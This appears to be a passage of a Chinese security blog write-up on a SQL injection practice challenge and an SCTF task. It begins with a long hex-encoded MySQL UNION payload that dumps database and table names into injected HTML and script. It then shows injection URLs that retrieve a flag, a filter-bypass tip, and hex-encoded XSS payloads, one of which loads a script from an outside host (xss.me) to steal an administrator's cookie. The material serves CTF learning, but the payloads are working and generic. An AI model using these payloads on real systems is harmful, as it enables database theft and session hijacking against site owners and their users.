2840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

传入到可以回显的位置 比如在这个注入点中的3
构造出一个url
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,concat…….

访问一下
1
2
然后这个可以随便输入 相当于你的name 最后会在页面有个标示 确定之后

3
再根据提示 构造出一个url确认就可以了
这个必须要是makman 否则会影响到后面的查看数据库中的具体信息
4
5
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,concat(0x6d616b,makman)
这个就是之前输入的那个url 会影响到这个地方
6
7

发现了一个奇怪的id 12999
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=12999
就可以得到flag
HKGGflagdfs56757fsdv

其实原理就是 利用了information_schema中的信息和html相互结合 来达到自动化的目的 可以加速sql查询的速度
他的缺点也是很明显的 适用的范围比较小 只有在mysql才可以 版本为5以上 才有information_schema 并且注入的类型需要是union回显的类型
在遇到一些过滤字符的时候 可以对这个脚本进行一些修改 比如过滤了空格之类的 可以替换成/**/等等 来达到绕过的目的

0x03 由SQLiGOD引发的联想
但是 看到了这个工具之后 没事的时候就在想阿想 洗澡的时候也在想阿想 然后想到了一种利用的方法
就是 利用union的回显来构造js语句 来达到xss的目的 相当于一个反射型的xss
在某些极端的环境下 可能会有用处 比如我想到一种情景
在用过union注入达到了后台管理员的账号和密码 之后 却没找到后台 这个时候 要能给管理员发个xss过去 说不定就有机会获得后台的url之类的
下面是一些实验
先用python一下

>>> '<script>alert("appleu0")</script>'.encode('hex')
'3c7363726970743e616c65727428226170706c65753022293c2f7363726970743e'

然后构造个url
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1%20and%201=2%20union%20select%201,2,0x3c7363726970743e616c65727428226170706c65753022293c2f7363726970743e
比如像这个样子的
就能弹框框

>>> '<script src="http://xss.me/1.js"></script>'.encode('hex')
'3c736372697074207372633d22687474703a2f2f7873732e6d652f312e6a73223e3c2f7363726970743e'

http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1%20and%201=2%20union%20select%201,2,0x3c736372697074207372633d22687474703a2f2f7873732e6d652f312e6a73223e3c2f7363726970743e
然后用xss平台获取cookie 获取后台的url就可以了

0x04 sctf中的一步
sctf里我也用到了这个技巧 所以就把文章延后发了去(其实就是拖延症犯了)
sctf 中的pt400里的一步就用到了这个技巧
idc.sycsec.com 有一个简单的注入 简单做了一下过滤 过滤了空格 用%0a就可以绕过 比较简单
注入比较简单 获取了账号密码之后 发现还有一个bug提交的页面
这个比较需要想象力 比赛到后期给了一个提示SQLi->XSS
然后就构造出了可以打cookie的url
获取一下后台的url就可以登陆了
平台都关了 就没图了